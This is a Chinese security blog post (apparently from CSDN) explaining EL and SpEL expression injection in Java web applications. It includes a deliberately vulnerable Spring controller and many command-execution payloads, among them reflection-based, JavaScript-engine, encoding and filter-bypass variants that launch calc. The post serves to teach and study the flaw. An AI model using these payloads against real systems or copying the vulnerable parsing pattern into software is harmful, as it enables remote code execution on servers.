Javaweb安全——表达式注入(EL+SpEL)

最新推荐文章于 2024-05-22 14:56:16 发布
最新推荐文章于 2024-05-22 14:56:16 发布
阅读量2.9k 收藏 8
点赞数 1
分类专栏: JavaWeb安全 文章标签: java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/125941767
版权

Java 表达式注入(EL+SpEL)

Java中表达式根据框架分为好多种,这里以JSP自带的表达式语言 EL 和使用较多的Spring框架所支持的SpEL为例。

其基本语法为${变量表达式}

EL

基础操作符

EL表达式支持大部分Java所提供的算术和逻辑操作符,这里就列出几个重要的:

操作符描述
.访问一个Bean属性或者一个映射条目 ${param.order}
[]访问一个数组或者链表的元素 ${param[“order”]}
( )组织一个子表达式以改变优先级

当要存取的属性名称中包含一些特殊字符,如.-等并非字母或数字的符号,或者动态取值就一定要使用[]

  • ${user["My-Name"]}
  • ``${sessionScope.user[data]}`

隐含对象

JSP EL支持下表列出的隐含对象:

作用域:

隐含对象描述
pageScopepage 作用域
requestScoperequest 作用域
sessionScopesession 作用域
applicationScopeapplication 作用域

属性值:

隐含对象描述
param${param.name}相当于 request.getParameter (name)
paramValues${paramvalues.name} 相当于 request.getParamterValues(name)
header${header.name} 相当于 request.getHeader(name)
headerValues${headerValues.name}相当于 request.getHeaderValues(name)
initParam上下文初始化参数
cookieCookie值 ${cookie. name .value}

上下文:

隐含对象描述
pageContextJSP页的上下文,可以用于访问 JSP 隐式对象,如request、response、session、servletContext 等。例如,${pageContext.response}为页面的响应对象赋值。

表达式注入漏洞

原理:表达式全部或部份外部可控,主要问题出在Java Bean的代码逻辑。

image-20220722203402045

POC:

//对应于JSP页面中的pageContext对象
${pageContext}
//获取Web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}
//文件头参数
${header}
//获取webRoot
${applicationScope}
//执行命令
${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

主要还是通过反射的方式去命令执行,也可以利用ScriptEngine调用JS引擎绕过过滤:

${''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc')")}

SpEL

SPEL(Spring Expression Language),从Spring 3开始引入,它能够以一种强大而简洁的方式将值装配到Bean属性和构造器参数中,在这个过程中所使用的表达式会在运行时计算得到值。

Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖关系,而SpEL可以方便快捷的对ApplicationContext中的Bean进行属性的装配和提取。

类类型表达式T(Type)

在SpEL表达式中,使用T(Type)运算符会调用类的作用域和方法。换句话说,就是可以通过该类类型表达式来操作类。

使用T(Type)来表示java.lang.Class实例,Type必须是类全限定名,但”java.lang”包除外,因为SpEL已经内置了该包,即该包下的类可以不指定具体的包名;使用类类型表达式还可以进行访问类静态方法和类静态字段。

表达式注入漏洞(Expression形式)

Demo:

@RestController
@RequestMapping("test")
public class TestController {
    @ResponseBody
    @RequestMapping(value = "/index", method = {RequestMethod.GET, RequestMethod.POST})
    public String index(String string) throws IOException {
        //创建解析器
        SpelExpressionParser spelExpressionParser = new SpelExpressionParser();
        //解析表达式
        Expression expression = spelExpressionParser.parseExpression(string);
        //求值
        return (String) expression.getValue();
    }
}

主要接口

  • ExpressionParser 接口:表示解析器,默认实现是 org.springframework.expression.spel.standard 包中的 SpelExpressionParser 类,使用 parseExpression 方法将字符串表达式转换为 Expression 对象,对于 ParserContext 接口用于定义字符串表达式是不是模板,及模板开始与结束字符;
  • EvaluationContext 接口:表示上下文环境,默认实现是org.springframework.expression.spel.support 包中的 StandardEvaluationContext 类,使用 setRootObject 方法来设置根对象,使用 setVariable 方法来注册自定义变量,使用 registerFunction 来注册自定义函数等等。
  • Expression 接口:表示表达式对象,默认实现是 org.springframework.expression.spel.standard 包中的 SpelExpression,提供 getValue 方法用于获取表达式值,提供 setValue 方法用于设置对象值。

传值的话,字符串要加上引号:

image-20220722214046440

命令执行就利用T(Type)去加载类:

T(java.lang.Runtime).getRuntime().exec("calc")
T(Runtime).getRuntime().exec("calc")

image-20220722214240531

也可以像Java一样直接new一个类去加载:

new java.lang.ProcessBuilder({'calc'}).start()
new ProcessBuilder({'calc'}).start()

image-20220722214435903

模板解析

修改一下上面的demo:

//模板解析
TemplateParserContext templateParserContext = new TemplateParserContext();
//解析表达式
Expression expression = spelExpressionParser.parseExpression(string, templateParserContext);

和Jsp EL稍微有些不同,SpEL解析表达式用的#{…}:

image-20220722230113887

  1. #{…} 用于执行SpEl表达式,并将内容赋值给属性
  2. ${…} 主要用于加载外部属性文件中的值

image-20220722225340116

image-20220722230224349

Bypass:

反射

T(String).getClass().forName("java.lang.Runtime").getRuntime().exec("calc")
// 同上,需要有上下文环境
#this.getClass().forName("java.lang.Runtime").getRuntime().exec("calc")
// 反射调用+字符串拼接,绕过正则过滤
T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})
// 同上,需要有上下文环境
#this.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})

字符编码

// String类动态生成字符
new java.lang.ProcessBuilder(new java.lang.String(new byte[]{99,97,108,99})).start()
// char转字符串,再字符串concat
T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(99)))

字符串拼接

T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})

JavaScript引擎

T(javax.script.ScriptEngineManager).newInstance().getEngineByName("nashorn").eval("s=[3];s[0]='cmd';s[1]='/C';s[2]='calc';java.la"+"ng.Run"+"time.getRu"+"ntime().ex"+"ec(s);")T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval("xxx"),)

绕过T( 过滤

//%00会被直接替换为空
T%00(new)

绕过getClass(过滤

''.getClass 替换为 ''.class.getSuperclass().class
''.class.getSuperclass().class.forName('java.lang.Runtime').getDeclaredMethods()[14].invoke(''.class.getSuperclass().class.forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'calc')

使用Spring工具类

//反序列化
T(org.springframework.util.SerializationUtils).deserialize(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('rO0AB...'))
// 执行自定义类的静态代码块
T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADIAtQ....'),T(org.springframework.util.ClassUtils).getDefaultClassLoader())

参考

https://www.cnblogs.com/bitterz/p/15206255.html

https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf

https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection
w.cnblogs.com/bitterz/p/15206255.html

Arnoldqqq
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Java代码审计】表达式注入
大河之犬的博客
04-02 864
表达式注入是一种安全漏洞,发生在应用程序中使用动态表达式的情况下。在表达式注入中,攻击者通过在输入数据中插入恶意代码来利用应用程序中的动态表达式执行漏洞,从而执行恶意操作。这种漏洞通常发生在使用解释性语言或动态执行代码的环境中。
Java代码审计之SpEL表达式注入漏洞分析
道阻且长,行则将至。
12-07 636
表达式注入是 Java 安全中一类常见的能够注入命令并形成 RCE 的漏洞,而常见的表达式注入方式有 EL 表达式注入SpEL 表达式注入和 OGNL 表达式注入等。本文将通过调试分析 CVE-2022-22963 漏洞来入门学习 SpEL 表达式注入漏洞的原理。
[Java安全]—SPEL表达式注入
Sentiment的博客
05-01 4133
前言 在前几天的网刃杯中,出了一道SPEL注入的Java题,在复现后其实对于原理和内部流程还是不够了解,所以现在浅学一下。 配置 https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce,导入maven依赖 为了后期debug调试简便些,可以修改一下控制器 修改后运行,访问localhost:9091/article?id=${5*5},出现结果25则为配置成功 影响版本 Spr
Java代码审计---SpEL表达式注入
最新发布
qq_45317844的博客
05-22 502
是 Spring 中的表达式语言,用于在运行时评估和处理表达式。它提供了一种灵活的方式来访问和操作对象的属性、方法和其他表达式SpEL可以用于配置文件、注解、XML 配置等多种场景,用于实现动态的、可配置的行为。它支持常见的表达式操作,如算术运算、逻辑运算、条件判断、集合操作等,并且可以与 Spring 框架的其他功能整合使用。由于SpEL具有代码调用,我们可以通过SpEL注入来执行系统命令,进而导致RCE漏洞。
Java表达式注入(JSP EL表达式注入
GalaxySpaceX的博客
08-16 1112
Java表达式注入(JSP EL表达式注入
『Java安全EL表达式注入
Ho1aAs‘s Blog
04-02 5031
文章目录前言EL表达式解析启用/禁用EL表达式注入绕过方式1. 反射2. js引擎rce参考引用完 前言 EL表达式全称Express Language EL表达式语法以${}包裹 其他使用方法见参考文章 EL表达式解析启用/禁用 默认为启用,jsp会解析EL表达式,除非配置<%@ page isELIgnored ="true|false" %>,或者是全局pom.xml设置 <jsp-config> <jsp-property-group>
EL表达式
顺其自然~专栏
09-22 308
以MVC模式设计程序,JSP只是视图,视图的任务就是显示响应,而不是在JSP中做任何关于程序控制和业务逻辑的事情。所以在JSP页面中应该尽可能少的、或者是完全不出现Java代码。 在使用JSP标准动作操作 JavaBean时,如果JavaBean的属性是 String类型或者基本类型,则能够实现类型的自动转换,如 JavaBean的属性从String类型可自动转换成int类型。如果 Javabean中的属性不是 String类型和基本类型,而是一个 Object类型,并且属性还有自己的属性,如何获得此 O
SPEL模板的使用
Petrichor_Lhc的博客
02-20 1803
SPEL模板的使用 1.AServiceImpl private TemplateParserContext templateParserContext; @PostConstruct private void init() { this.templateParserContext = new TemplateParserContext("#[", "]"); } private void A(){ ExpressionParser parser = new SpelExpressionParser();
JavaWeb(Servlet+request和response+EL表达式+JSP+Cookie和Session)
06-21
JavaWebServlet JavaWeb 是基于 Java 语言的 Web 应用程序开发技术,Servlet 是 ...在 JavaWeb 应用程序中,Servlet、JSP、EL 表达式、Cookie 和 Session 是紧密相关的技术,共同组成了 JavaWeb 应用程序的核心组件。
Javaweb El表达式实例详解
09-02
**Javaweb EL表达式实例详解** EL(Expression Language)是JSP 2.0引入的一种强大的表达式语言,它的主要目标是简化JSP页面中的数据访问和处理。EL表达式提供了一种简洁的方式,用于从不同类型的Web域中获取Java...
JavaWeb开发——JSP技术
03-24
此文章包含JSP简介、JSP运行原理、JSP标签与标签库及其使用、JSP的内置对象与作用域对象、EL表达式和MVC模式的简介,以及部分案例展示。 适用于任何学习JavaWeb开发中,需要了解JSP技术的人群,希望这篇文章能对大家...
JavaWeb核心资源包(EL+JSTL+Standard+Mysql-Connector+Jsp+Servlet)
06-18
学习JavaWeb经常遇到Servlet错误,数据库连接错误,EL表达式无法使用,页面显示不出来,然后是各种500错误。很多时候都是因为这个六个核心资源包出了问题,因此我上传了这六个核心资源包,包括EL+JSTL+Standard+...
基于JavaWeb Servlet+JSP+MYSQL+Bootstrap 文章管理系统.zip
10-16
基于JavaWeb Servlet+JSP+MYSQL+Bootstrap 文章管理系统 基于JavaWeb Servlet+JSP+MYSQL+Bootstrap 文章管理系统 基于JavaWeb Servlet+JSP+MYSQL+Bootstrap 文章管理系统 基于JavaWeb Servlet+JSP+MYSQL+Bootstrap ...
SpEL表达式注入漏洞学习
weixin_45794666的博客
03-09 3121
SpEL表达式注入漏洞 前言 因为前端时间的spring gateway rce正是由此导致的所以来学习一下 介绍 Spring Expression Language(简称SpEL)是一种强大的表达式语言,支持在运行时查询和操作对象图。语言语法类似于统一EL,但提供了额外的功能,是方法调用和基本的字符串模板了同时SpEL是API接口的形式因为创建的,所以允许将其集成到其他应用程序和框架中。 环境搭建 https://github.com/LandGrey/SpringBootVulExploit/tree
Java表达式注入(OGNL 表达式注入
GalaxySpaceX的博客
08-23 1925
Java表达式注入(OGNL 表达式注入
【代码审计】表达式注入
TeamsSix 的 CSDN 空间
11-29 1043
1、介绍 表达式语言(Expression Language)简称 EL 表达式,是一种 JSP 内置的语言。 在 JSP 中,使用 ${} 来表示 EL 表达式,例如 ${name} 表示获取 name 变量。 在 EL 表达式中有两种获取对象属性的方法,第一种为 ${param.name},第二种为 ${param[name]} 2、实例 使用实例 使用 param 对象获取用户传入的参数值,这里的 ${param.name} 相当于 request.getParameter(“name”) <%
Java表达式注入SpEL表达式注入
GalaxySpaceX的博客
08-18 1207
Java表达式注入SpEL表达式注入
EL 表达式注入攻击
m0_62207482的博客
03-04 147
例如,${ userinfo}代表获取变量userinfo的值。当EL表达式中的变量不给定范围时,则默认在page范围查找,然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量,例如:${ pageScope. userinfo}表示访问page范围中的userinfo变量。事实上,可以将EL表达式理解为一种简化的JSP代码。简单地说,使用EL表达式语法:${EL表达式}JSP表达式:<%=变量或表达式>声明jsp的成员变量或成员方法。
表达式注入
weixin_42587866的博客
01-10 112
表达式注入是一种常见的应用安全漏洞,它指的是攻击者通过在程序的输入中注入恶意的表达式,来绕过程序的验证和过滤机制,达到执行意图不明的指令或访问敏感资源的目的。 表达式注入的攻击方式有很多种,例如:SQL 注入、OS 命令注入、脚本注入等。 为了防范表达式注入攻击,系统设计人员需要采取一些措施,例如: 对输入进行严格的验证和过滤 尽可能地使用预编译的语句或存储过程来执行数据库操作 限制用户的输入长...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值